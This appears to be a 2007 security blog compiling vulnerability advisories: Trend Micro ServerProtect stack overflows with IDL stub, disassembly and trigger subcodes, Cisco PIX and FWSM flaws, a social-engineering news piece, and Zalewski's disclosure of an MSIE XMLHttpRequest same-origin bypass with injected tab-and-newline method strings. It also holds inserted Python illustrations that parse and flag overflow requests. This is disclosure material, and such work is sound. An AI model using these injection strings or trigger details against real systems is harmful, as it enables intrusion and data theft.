Snort users who cannot upgrade immediately are advised to disable the DCE/RPC preprocessor by removing the DCE/RPC preprocessor directives from snort.conf and restarting Snort. However, be advised that disabling the DCE/RPC preprocessor reduces detection capabilities for attacks in DCE/RPC traffic. After upgrading, customers should reenable the DCE/RPC preprocessor.

Detecting Attacks Against This Vulnerability:
Sourcefire will be releasing a rule pack that provides detection for attacks against this vulnerability.

FAQs:

What does the update do?
Snort 2.6.1.3 (or later) removes the vulnerability by correcting the buffer overflow condition in the DCE/RPC preprocessor.

Has Sourcefire received any reports that this vulnerability has been exploited?
No. Sourcefire has not received any reports that this vulnerability has been exploited.

Acknowledgments:
Sourcefire would like to thank Neel Mehta from IBM X-Force for reporting this issue and working with us to resolve it.


Trend Micro ServerProtect eng50.dll Stack Overflow Vulnerabilities

Trend Micro ServerProtect eng50.dll Stack Overflow Vulnerabilities February 20, 2007

CVE ID: CVE-2007-1070

Affected Vendor: Trend Micro

Affected Products:
ServerProtect for Windows 5.58
ServerProtect for EMC 5.58
ServerProtect for Network Appliance Filer 5.61
ServerProtect for Network Appliance Filer 5.62

TippingPoint(TM) IPS Customer Protection:

TippingPoint IPS customers have been protected against this vulnerability since January 16, 2007 by a pre-existing Digital Vaccine protection filter ID 5101. For further product information on the TippingPoint IPS: http://www.tippingpoint.com

Vulnerability Details: These vulnerabilities allow attackers to execute arbitrary code on vulnerable installations of Trend Micro ServerProtect. Authentication is not required to exploit these vulnerabilities.

The specific flaws exist within the StCommon.dll library and are reachable remotely through a DCE/RPC endpoint on TCP port 5168 bound to by the service SpntSvc.exe. The RPC endpoint is exposed from TmRpcSrv.dll with the following IDL stub information:
// opcode: 0x00, address: 0x65741030
// uuid: 25288888-bd5b-11d1-9d53-0080c83a5c2c
// version: 1.0

error_status_t rpc_opnum_0 (
[in] handle_t arg_1,
[in] long trend_req_num,
[in][size_is(arg_4)] byte overflow_str[],
[in] long arg_4,
[out][size_is(arg_6)] byte arg_5[],
[in] long arg_6
);

The upper half of the 'trend_req_num' DWORD RPC argument from above is used within TmRpcSrv.dll as an index into a call table. It must specifically be 0x0003 which results in a call to StRpcSrv.65671000(). The original arguments to the RPC endpoint are then passed to this called routine:
657416E6 mov eax, opnum0_call_table[eax*4]
657416ED test eax, eax
657416EF jnz short loc_65741707
...
65741707 loc_65741707:
65741707 mov [ebp+var_4], 0
6574170E mov edx, [ebp+sizeof_arg5]
65741711 push edx
65741712 mov edx, [ebp+arg5_array]
65741715 push edx
65741716 mov edx, [ebp+sizeof_overflow_str]
65741719 push edx
6574171A mov edx, [ebp+overflow_str]
6574171D push edx
6574171E push ecx ; trend_req_num
6574171F call eax ; call handler


The lower half of the 'trend_req_num' DWORD RPC argument is then used within StRpcSrv.dll as an index into a second call table. The value of this lower half controls the code flow to the following vulnerabilities and is hereafter referred to as the 'subcode'.

Vulnerability One
A subcode value of 0x0004 results in a call to ENG_SetRealTimeScanConfigInfo() which subsequently calls through Eng50.61181940() -> Eng50.611819E0() -> Eng50.61190F60() and can result in a stack overflow due to an unbounded widechar string copy into a ~600 byte stack-based buffer as shown in the following relevant excerpt:
61190FC7 lea edx, [esp+288h+szShortPath]
61190FCB push esi
61190FCC push edx
61190FCD call _wcscpy

Vulnerability Two
A subcode value of 0x0047 results in a call to ENG_SendEMail() which can result in a stack overflow due to an unbounded widechar string copy into a ~2k stack-based buffer as shown in the following relevant excerpt:
6118A161 mov esi, [esp+780h+arg_0]
6118A168 lea eax, [esp+780h+var_778]
6118A16C push esi
6118A16D push eax
6118A16E call _wcscpy

The resulting stack overflows can be leveraged to execute arbitrary code under the privileges of the SYSTEM user.
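As an added illustration that is not part of the advisory or of TippingPoint's filter, the following Python decodes the rpc_opnum_0 request stub described above, splits trend_req_num into its table index and subcode, and flags a payload whose wide-character length cannot fit the handler's stack buffer. The NDR marshalling layout, the exact buffer limits and the sample requests are assumptions built from the figures given in the advisory.

```python
import struct

# Values taken from the advisory: the upper half of trend_req_num must be 0x0003
# to reach StRpcSrv.dll, the lower half ("subcode") selects the Eng50 handler.
# Limits are the advisory's approximate stack buffer sizes in wide characters.
ST_TABLE_INDEX = 0x0003
SUBCODE_LIMIT_WCHARS = {0x0004: 600 // 2,    # ENG_SetRealTimeScanConfigInfo
                        0x0047: 2048 // 2}   # ENG_SendEMail

def parse_opnum0_stub(stub: bytes) -> dict:
    """Decode the rpc_opnum_0 request stub. Assumed little-endian NDR layout:
    trend_req_num, conformant array (max_count, bytes, pad to 4), arg_4, arg_6."""
    trend_req_num, max_count = struct.unpack_from("<II", stub, 0)
    data = stub[8:8 + max_count]
    if len(data) != max_count:
        raise ValueError("truncated conformant array")
    off = 8 + max_count + (-(8 + max_count)) % 4   # align next long to 4 bytes
    arg_4, arg_6 = struct.unpack_from("<II", stub, off)
    return {"table_index": trend_req_num >> 16, "subcode": trend_req_num & 0xFFFF,
            "overflow_str": data, "arg_4": arg_4, "arg_6": arg_6}

def wcslen(buf: bytes) -> int:
    """Wide chars wcscpy would copy: up to the first 0x0000 wchar, else all of them."""
    for i in range(0, len(buf) - 1, 2):
        if buf[i] == 0 and buf[i + 1] == 0:
            return i // 2
    return len(buf) // 2

def classify(stub: bytes) -> str:
    """Flag a request whose widechar payload cannot fit the handler's stack buffer."""
    req = parse_opnum0_stub(stub)
    if req["table_index"] != ST_TABLE_INDEX:
        return "other-table"
    limit = SUBCODE_LIMIT_WCHARS.get(req["subcode"])
    if limit is None:
        return "other-subcode"
    return "overflow" if wcslen(req["overflow_str"]) >= limit else "ok"

def build_stub(table_index: int, subcode: int, wide_str: str) -> bytes:
    """Constructed sample input (not a capture), marshalled as parse_opnum0_stub reads it."""
    payload = wide_str.encode("utf-16-le") + b"\x00\x00"
    body = struct.pack("<II", (table_index << 16) | subcode, len(payload)) + payload
    body += b"\x00" * ((-len(body)) % 4)
    return body + struct.pack("<II", len(payload), 4096)

if __name__ == "__main__":
    print(classify(build_stub(0x0003, 0x0004, "C:\\scan\\config.ini")))  # ok
    print(classify(build_stub(0x0003, 0x0047, "x" * 1500)))              # overflow
```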
Vendor Response:

Trend Micro has issued an update to correct this vulnerability. More details can be found at:

http://esupport.trendmicro.com/support/viewxml.do?ContentID=EN-1034290

Disclosure Timeline:

2007.01.16 Digital Vaccine released to TippingPoint customers
2007.02.01 Vulnerability reported to vendor
2007.02.20 Coordinated public release of advisory


Credit:

This vulnerability was discovered by Pedram Amini, TippingPoint Security Research Team.


Trend Micro ServerProtect eng50.dll Stack Overflow Vulnerabilities

Trend Micro ServerProtect eng50.dll Stack Overflow Vulnerabilities February 20, 2007

CVE ID: CVE-2007-1070

Affected Vendor: Trend Micro

Affected Products:
ServerProtect for Windows 5.58
ServerProtect for EMC 5.58
ServerProtect for Network Appliance Filer 5.61
ServerProtect for Network Appliance Filer 5.62

Friday, February 16, 2007

When is a backdoor really a backdoor?

When is a backdoor really a backdoor?
By John Leyden
Published Thursday 15th February 2007 16:46 GMT

Workplace smoking bans may be good for workers' health, but could open the back door to hackers.

In a recent social engineering test undertaken by UK-based security consultancy NTA Monitor, a tester was able to easily gain access to a corporate building through a back door that was left open for smokers. Once inside, the penetration tester was able to easily bluff his way into a meeting room, claiming the IT department had sent him. Even without a pass, he gained access unchallenged and was then able to connect his laptop to the firm's VoIP network via a telephone connection point.


NTA Monitor technical director Roy Hills comments: "It used to be that companies 'left the back door open' in terms of internet security. Now they are literally leaving their buildings open to accommodate smokers.

"Once inside a corporate building, an attacker can use social methods on employees to gain access to restricted areas and information unless a rigid staff pass system is in place," he added.

Smoking will be banned in all indoor public spaces in the UK in July 2007. In many other European countries, such as Spain, workplace smoking restrictions have already been applied. ®


Thursday, February 15, 2007

Cisco Firewall Services Module SIP DoS and ACL Corruption

Secunia Advisory: SA24180
Release Date: 2007-02-15


Critical: Moderately critical
Impact: DoS
Where: From remote
Solution Status: Vendor Patch


Software: Cisco Firewall Services Module (FWSM) 2.x

Description:
A vulnerability and a security issue have been reported in Cisco Firewall Services Module, which can be exploited by malicious people to cause a DoS (Denial of Service) or bypass certain security restrictions.

1) An unspecified error exists when inspecting malformed SIP packets. This can be exploited to cause the device to reload by sending specially crafted SIP packets.

Successful exploitation requires that "SIP fixup" is enabled, which is the default setting.

2) A security issue when manipulating ACLs (Access Control Lists) that make use of object groups can corrupt ACLs, resulting in ACEs (Access Control Entries) being skipped or not evaluated in order, which can be exploited to bypass certain security restrictions.

Note: Only an administrative user can change ACLs. Additionally, this does not affect devices which are reloaded after ACLs have been manipulated.

Solution:
Update to version 2.3(4.12) or 3.1(3.24)

Provided and/or discovered by:
Reported by the vendor.

Original Advisory:
http://www.cisco.com/warp/public/707/cisco-sa-20070214-fwsm.shtml






Please note: The information that this Secunia Advisory is based on comes from a third party unless stated otherwise.

Secunia collects, validates, and verifies all vulnerability reports issued by security research groups, vendors, and others.

Wednesday, February 14, 2007

Cisco PIX Firewall Lets Remote Users Deny Service and Remote Authenticated Users Gain Elevated Privileges

SecurityTracker Alert ID: 1017652
SecurityTracker URL: http://securitytracker.com/id?1017652
CVE Reference: GENERIC-MAP-NOMATCH
Date: Feb 14 2007
Impact: Denial of service via network, User access via network
Fix Available: Yes
Vendor Confirmed: Yes
Advisory: Cisco Security Advisory
Version(s): prior to 6.3(5.115), 7.0(5.2), 7.1(2.5), and 7.2(2.10)
Description: A vulnerability was reported in Cisco PIX Firewall. A remote authenticated user can obtain administrative privileges on the target system. A remote user can cause denial of service conditions.

A remote user can send specially crafted data to cause the target device to reload under certain conditions.

The vulnerability can be triggered by specific Hypertext Transfer Protocol (HTTP), Session Initiation Protocol (SIP), and Transmission Control Protocol (TCP) traffic.

The vulnerability occurs only when HTTP inspection is enabled via a specific HTTP map in the configuration file, when SIP fixup or inspect is enabled, or when any of the following TCP-based protocols are inspected:

* Computer Telephony Interface Quick Buffer Encoding (CITQBE)
* Distributed Computing Environment/Remote Procedure Call (DCE/RPC)
* Domain Name Service (DNS)
* Extended Simple Mail Transfer Protocol (ESMTP)
* File Transfer Protocol (FTP)
* H.323 protocol
* Hyper Text Transfer Protocol (HTTP)
* Internet Locator Server (ILS)
* Instant Messaging (IM)
* Point-to-Point Tunneling Protocol (PPTP)
* Remote Shell (RSH)
* Real Time Streaming Protocol (RTSP)
* Session Initiation Protocol (SIP)
* Skinny (or Simple) Client Control Protocol (SCCP)
* Simple Mail Transfer Protocol (SMTP)
* Oracle SQL*Net
* Sun RPC

Cisco has assigned Cisco Bug IDs CSCsd75794, CSCse27708, CSCsd97077, and CSCsh12711 to this vulnerability.

When the LOCAL method is used for user authentication, a remote authenticated user that is defined in the local database with a privilege of zero can obtain elevated privileges (to and including level 15, administrative privileges).

Cisco has assigned Cisco Bug IDs CSCsh33287 to this vulnerability.
Impact: A remote user can cause denial of service conditions.

A remote authenticated user can obtain administrative privileges in certain configurations.
Solution: Cisco has issued fixed versions (6.3(5.115), 7.0(5.2), 7.1(2.5), and 7.2(2.10)), available at:

http://www.cisco.com/pcgi-bin/tablebuild.pl/pix

The Cisco advisory is available at: http://www.cisco.com/warp/public/707/cisco-sa-20070214-pix.shtml

Vendor URL: www.cisco.com/warp/public/707/cisco-sa-20070214-pix.shtml

Friday, February 2, 2007

Web 2.0 backdoors made easy with MSIE & XMLHttpRequest

From: Michal Zalewski (lcamtuf at dione.ids.pl)
Date: Sat Feb 03 2007 - 14:57:01 CST

As you probably know, the famous "web 2.0" XMLHttpRequest object allows
client-side web scripts to send nearly arbitrary HTTP requests, and then
freely analyze and manipulate the returned response, including HTTP
headers.

This gives an unprecedented level of control over your browser to the
author of a visited site. For this reason, to prevent various types of
abuse, XMLHttpRequest is restricted to interacting only with the site from
where the script originated, based on protocol, port, and host name
observed.

Unfortunately, due to a programming error, Microsoft's Msxml2.XMLHTTP
ActiveX object that MSIE relies on allows you to bypass this restriction
with the use of - BEHOLD - a highly sophisticated newline-and-tab
technology.

If the victim uses a proxy server (which is very common in corporate
settings), any intranet or Internet site can be interacted with in this
arcane manner:

xmlhttp.open("GET\thttp://dione.ids.pl/\tHTTP/1.0\n\n", "x",true);

Otherwise, only sites co-hosted on the same server or load balancer can be
interacted with - which today can still mean quite a lot, for example
foxyteens.googlepages.com and gmail.com go nicely together. In such a
case, the request is:

xmlhttp.open("GET\t/\tHTTP/1.0\nHost:\tdione.ids.pl\n\n", "x",true);

All contents of the requested page, including cookies, hidden form tokens,
etc, can be then extracted through the use of responseText and
getResponseHeader(), manipulated by the script, and used in subsequent
GET or POST requests.

A test page is available here:

http://lcamtuf.coredump.cx/iexmltest.html

The browser will think it's still talking to the site from which the
script originated, so no session cookies will be sent to that server - but
some interesting activity is still possible: in the true spirit of Web
2.0, this can be trivially turned into an interactive client-side backdoor
proxy that may send shivers down the spines of some corporate security
dudes.

Consider this example: a guy working for company X is sent a link to
hotbrunette25's blog or a really cute video of singing hamsters. While he
is preoccupied with that resource, the creator of a malicious script can
order victim's browser to:

1) Rapidly scan company's internal web services (XMLHttpRequest
supports asynchronous connections and connection notification),

2) Obtain real-time copies of site fronts (raw HTML responseText can be
sent back directly to the attacker through a "legitimate"
XMLHttpRequest).

3) Interact with interesting ones in real-time in a virtually
unrestricted manner (POSTs and GETs with any payloads can be
requested, cookies can be set with setRequestHeader, etc).

Attacker functionality can be essentially implemented as a browser plugin
or a custom proxy and allow what amounts to highly-responsive,
feel-like-you're-there, remote presence - which certainly takes what used
to be blind bounce scanning and XSS to a 2.0 level.

In a setting where no proxy is available, and no elaborate private
infrastructure would be exposed to the attacker, the author of
foxyteens.googlepages.com can of course still use this to send possum
gang-rape spam through GMail from victim's IP, or whatnot - but that's of
course less exciting.

/mz

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
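As an added illustration, not from Zalewski's post nor from any browser's code, the Python below shows the RFC 2616 token check an XMLHttpRequest implementation must apply to the method argument, and parses the two strings from the post the way a proxy or origin server would read them, which is why the origin check is defeated. The wire format of the unchecked client and the origin host intranet.example are assumptions.

```python
import re

# RFC 2616: a method is a "token", i.e. one or more chars that are neither CTLs
# (0x00-0x1F, 0x7F) nor separators. Tab and newline are CTLs, so the strings from
# the post can never be valid methods; the bypass relies on this check being absent.
_SEPARATORS = '()<>@,;:\\"/[]?={} \t'
_TOKEN_RE = re.compile(r"[^\x00-\x1f\x7f" + re.escape(_SEPARATORS) + r"]+")

def is_token(method: str) -> bool:
    return _TOKEN_RE.fullmatch(method) is not None

def naive_request(method: str, path: str, origin_host: str) -> bytes:
    """Assumed wire format of a client that splices the method in unchecked."""
    return f"{method} {path} HTTP/1.1\r\nHost: {origin_host}\r\n\r\n".encode("latin-1")

def checked_open(method: str, path: str, origin_host: str) -> bytes:
    """Hardened form: refuse any method that is not a token before it reaches the wire."""
    if not is_token(method):
        raise ValueError("method is not an HTTP token")
    return naive_request(method, path, origin_host)

def effective_target(raw: bytes) -> tuple:
    """Read the bytes the way a proxy or origin server would: the first line is the
    request line, headers end at the first blank line, and an absolute-URI request
    line or the first Host header names the target. Bare LF is accepted as a line end."""
    head = raw.decode("latin-1").replace("\r\n", "\n").split("\n\n", 1)[0]
    lines = head.split("\n")
    method, target = lines[0].split()[:2]
    host = target[7:].split("/", 1)[0] if target.lower().startswith("http://") else None
    for line in lines[1:]:
        name, _, value = line.partition(":")
        if host is None and name.strip().lower() == "host":
            host = value.strip()
    return method, host

# Constructed inputs: the two method strings quoted in the post, as sent by a page
# whose origin is the assumed host intranet.example.
INJECTED = ["GET\thttp://dione.ids.pl/\tHTTP/1.0\n\n",
            "GET\t/\tHTTP/1.0\nHost:\tdione.ids.pl\n\n"]

if __name__ == "__main__":
    print(effective_target(naive_request("GET", "/", "intranet.example")))
    for m in INJECTED:
        print(is_token(m), effective_target(naive_request(m, "/", "intranet.example")))
```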
